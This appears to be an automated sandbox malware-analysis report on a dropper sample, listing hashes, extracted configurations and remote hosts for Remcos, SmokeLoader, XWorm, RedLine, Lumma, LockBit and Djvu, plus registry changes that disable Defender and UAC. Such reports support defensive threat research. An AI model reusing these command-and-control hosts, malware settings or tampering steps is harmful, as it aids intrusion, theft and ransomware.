Resubmissions
16-02-2024 02:54
240216-dd14ysfc71 1016-02-2024 01:10
240216-bjwqbaea93 1009-02-2024 16:00
240209-tfl1taed86 1009-02-2024 13:49
240209-q4sxgsbf9v 1006-02-2024 16:58
240206-vg3kmadccn 1006-02-2024 00:32
240206-avq4jadbfj 10Analysis
-
max time kernel
1038s -
max time network
1796s -
platform
windows10-1703_x64 -
resource
win10-20240214-en -
resource tags
arch:x64arch:x86image:win10-20240214-enlocale:en-usos:windows10-1703-x64system -
submitted
16-02-2024 02:54
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.bin.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.bin.exe
Resource
win10-20240214-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.bin.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.bin.exe
Resource
win11-20240214-en
General
-
Target
4363463463464363463463463.bin.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
smokeloader
pub1
Extracted
remcos
RemoteHost
hendersonk1.hopto.org:2404
henderson1.camdvr.org:2404
centplus1.serveftp.com:2404
harrywlike.ddns.net:2404
genekol.nsupdate.info:2404
harrywlike1.ddns.net:2404
hendersonk2022.hopto.org:2404
genekol1.nsupdate.info:2404
generem.camdvr.org:2404
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
sonic.exe
-
copy_folder
yakkk
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
chrome
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
gsgjdwg-1J0WWM
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
fuckuuuuu
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
xworm
5.0
159.89.100.67:7000
fhBwWqkQJ7j5rHzI
-
install_file
USB.exe
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/shell_reverse_tcp
127.0.0.1:12346
Extracted
redline
1
92.222.212.74:1450
Extracted
lumma
185.99.133.246
Extracted
C:\1YwR2c1YK.README.txt
lockbit
http://lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
http://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion
http://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion
http://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
http://lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion.ly
http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
http://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion.ly
http://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion.ly
http://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion.ly
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
https://twitter.com/hashtag/lockbit?f=live
http://lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onion
http://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion
http://lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd.onion
http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
http://lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad.onion
http://lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd.onion
http://lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd.onion
http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
https://gdpr.eu/what-is-gdpr/
https://gdpr-info.eu/
Extracted
F:\_README.txt
djvu
https://we.tl/t-uNdL2KHHdy
Extracted
lumma
https://resergvearyinitiani.shop/api
https://mealroomrallpassiveer.shop/api
https://gemcreedarticulateod.shop/api
https://secretionsuitcasenioise.shop/api
https://claimconcessionrebe.shop/api
https://liabilityarrangemenyit.shop/api
https://pavementpreferencewjiao.site/api
https://triangleseasonbenchwj.shop/api
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 4 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000001ac28-402.dat family_ammyyadmin behavioral2/files/0x000600000001ac28-403.dat family_ammyyadmin behavioral2/files/0x000600000001ac28-405.dat family_ammyyadmin behavioral2/files/0x000600000001ac28-406.dat family_ammyyadmin -
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Lumma Stealer payload V2 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000001ac55-1881.dat family_lumma_V2 -
Detect Lumma Stealer payload V4 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000001ac55-1881.dat family_lumma_v4 -
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4160-379-0x000002F513930000-0x000002F51393E000-memory.dmp family_xworm -
Detect ZGRat V1 26 IoCs
Processes:
resource yara_rule behavioral2/files/0x000700000001ac24-212.dat family_zgrat_v1 behavioral2/memory/992-214-0x0000000000050000-0x0000000000554000-memory.dmp family_zgrat_v1 behavioral2/files/0x000700000001ac24-211.dat family_zgrat_v1 behavioral2/files/0x000600000001ac2a-224.dat family_zgrat_v1 behavioral2/files/0x000600000001ac2a-387.dat family_zgrat_v1 behavioral2/files/0x000600000001ac2a-386.dat family_zgrat_v1 behavioral2/memory/4812-726-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-727-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-732-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-735-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-737-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-739-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-741-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-745-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-753-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-758-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-768-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-773-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-782-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-799-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-803-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-788-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-807-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/memory/4812-813-0x0000000005170000-0x0000000005373000-memory.dmp family_zgrat_v1 behavioral2/files/0x000700000001ac8a-3049.dat family_zgrat_v1 behavioral2/files/0x000600000001ad30-6076.dat family_zgrat_v1 -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Glupteba payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/524-42-0x0000000005090000-0x000000000597B000-memory.dmp family_glupteba behavioral2/memory/524-49-0x0000000000400000-0x0000000002FC1000-memory.dmp family_glupteba behavioral2/memory/524-381-0x0000000000400000-0x0000000002FC1000-memory.dmp family_glupteba behavioral2/memory/524-395-0x0000000000400000-0x0000000002FC1000-memory.dmp family_glupteba behavioral2/memory/2784-398-0x0000000000400000-0x0000000002FC1000-memory.dmp family_glupteba -
Lockbit
Ransomware family with multiple variants released since late 2019.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
Processes:
images.exe_vti_cnf.exeWattyl.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe" images.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe" _vti_cnf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe" Wattyl.exe -
Processes:
niks.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" niks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" niks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" niks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" niks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" niks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000001ac43-798.dat family_redline behavioral2/files/0x000900000001ad79-6937.dat family_redline behavioral2/files/0x000600000001ad57-7489.dat family_redline -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
ghjk.exeasdfg.exeMsBuild.exepinguin.exedialer.exedescription pid Process procid_target PID 5524 created 2936 5524 ghjk.exe 49 PID 6216 created 2936 6216 asdfg.exe 49 PID 6736 created 2936 6736 MsBuild.exe 49 PID 7960 created 3772 7960 pinguin.exe 72 PID 7412 created 2936 7412 dialer.exe 49 -
Processes:
File300un.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" File300un.exe -
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exeFile300un.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Files\File300un.exe = "0" File300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
Processes:
ladas.exeexplorgu.exeexplorgu.execmd.exefilename.exeexplorgu.exeexplorgu.exeupdater.exeexplorgu.exeamert.exeladas.exeexplorgu.exeexplorgu.exeexplorgu.exeniks.exeexplorgu.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ladas.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ filename.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ladas.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ niks.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe -
Renames multiple (181) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (213) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/2392-452-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-468-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-474-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-470-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-478-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-476-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-496-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2392-497-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exerundll32.exeflow pid Process 339 4288 msiexec.exe 377 5140 rundll32.exe -
Creates new service(s) 1 TTPs
-
Disables RegEdit via registry modification 3 IoCs
Processes:
_vti_cnf.exeWattyl.exeimages.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" _vti_cnf.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Wattyl.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" images.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
filename.exedescription ioc Process File created C:\Windows\system32\drivers\etc\hosts filename.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 4584 netsh.exe -
Stops running service(s) 3 TTPs
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral2/files/0x000700000001ae5c-11086.dat acprotect -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
amert.exeexplorgu.exeexplorgu.exeladas.exeredline1234min.exeexplorgu.execmd.exeexplorgu.exeexplorgu.exeexplorgu.exeiojmibhyhiws.exeniks.exeupdater.exeexplorgu.exeladas.exeexplorgu.exeexplorgu.exefilename.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ladas.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion redline1234min.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iojmibhyhiws.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion niks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ladas.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ladas.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion niks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iojmibhyhiws.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ladas.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion redline1234min.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
explorgu.exehiuhehufw.exe1800.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\International\Geo\Nation explorgu.exe Key value queried \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\International\Geo\Nation hiuhehufw.exe Key value queried \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\International\Geo\Nation 1800.exe -
Drops startup file 6 IoCs
Processes:
cmd.exesc.exeSTAR.exeNINJA.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MiConfig.lnk cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe sc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe sc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe STAR.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SBADLH.lnk NINJA.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MiConfig.lnk cmd.exe -
Executes dropped EXE 64 IoCs
Processes:
dayroc.exenine.exed21cbe21e38b385a41a68c5e6dd32f4c.exetoolspub1.exeapp1.exe6.exeStealerClient_Sharp_1_4.exema.exe.exed21cbe21e38b385a41a68c5e6dd32f4c.exe7e207560.exepowershell.exe7e207560.exeBBLb.exeosminogs.exeghjk.exeFile300un.exesc.exea5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe1.exe721E.exeConhost.exe96CD.execsrss.exeinstaller.exejune.exejune.tmpConhost.exeBEF8.exefor.exeasdfg.exebeacon_certutil.exeghjkl.exeSTAR.exebott.exeConhost.exefirefox.exe96CD.exeD48.exebuild2.exebuild2.exebuild3.exeqemu-ga.exe4AD0.exeghjk.exeghjk.exeinstall.execmd.exefilename.exe.exebuild3.exesyncUpd.exeniks.exeamert.exeexplorgu.exeinstall.exeexplorgu.exefu.exeladas.exemstsca.exedota.exeupdater.exepid Process 648 dayroc.exe 5068 nine.exe 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 3500 toolspub1.exe 4160 app1.exe 1468 6.exe 2636 StealerClient_Sharp_1_4.exe 992 ma.exe 4800 .exe 2784 d21cbe21e38b385a41a68c5e6dd32f4c.exe 3516 7e207560.exe 2132 powershell.exe 2640 7e207560.exe 4696 BBLb.exe 4288 osminogs.exe 4812 ghjk.exe 664 File300un.exe 2124 sc.exe 4840 a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe 516 1.exe 4068 721E.exe 2292 Conhost.exe 4268 96CD.exe 2172 csrss.exe 4388 installer.exe 3492 june.exe 4556 june.tmp 2176 Conhost.exe 1668 BEF8.exe 876 for.exe 4028 asdfg.exe 4776 beacon_certutil.exe 356 ghjkl.exe 2676 STAR.exe 32 bott.exe 1600 Conhost.exe 4480 firefox.exe 2572 96CD.exe 1864 D48.exe 5072 build2.exe 1336 build2.exe 4360 build3.exe 652 qemu-ga.exe 5132 4AD0.exe 4696 BBLb.exe 5564 ghjk.exe 5524 ghjk.exe 5428 install.exe 5852 cmd.exe 5020 filename.exe 5576 .exe 1332 build3.exe 5996 syncUpd.exe 2888 niks.exe 4040 amert.exe 4516 explorgu.exe 2944 install.exe 5428 install.exe 5840 explorgu.exe 4308 fu.exe 1368 ladas.exe 5864 mstsca.exe 4900 dota.exe 2664 updater.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
niks.exeamert.exeladas.exeexplorgu.exeexplorgu.exeladas.exeexplorgu.exeexplorgu.exeexplorgu.exeexplorgu.exeexplorgu.execmd.exeexplorgu.exeexplorgu.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine niks.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine ladas.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine ladas.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine cmd.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Wine explorgu.exe -
Loads dropped DLL 64 IoCs
Processes:
june.tmpConhost.exeinstall.exerundll32.exerty37.exesyncUpd.exeUser%20OOBE%20Broker.exerundll32.exeNational.exejet.exenative.exeMsiExec.exehiuhehufw.exeransom_builder.exeapril.tmpliveupdate.exeregisters.exepid Process 4556 june.tmp 1600 Conhost.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 5428 install.exe 3888 rundll32.exe 5984 rty37.exe 5996 syncUpd.exe 5996 syncUpd.exe 5968 User%20OOBE%20Broker.exe 5140 rundll32.exe 5968 User%20OOBE%20Broker.exe 6896 National.exe 5968 User%20OOBE%20Broker.exe 7836 jet.exe 7836 jet.exe 7840 native.exe 6788 MsiExec.exe 3332 hiuhehufw.exe 6392 ransom_builder.exe 6392 ransom_builder.exe 6392 ransom_builder.exe 6156 april.tmp 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 5968 User%20OOBE%20Broker.exe 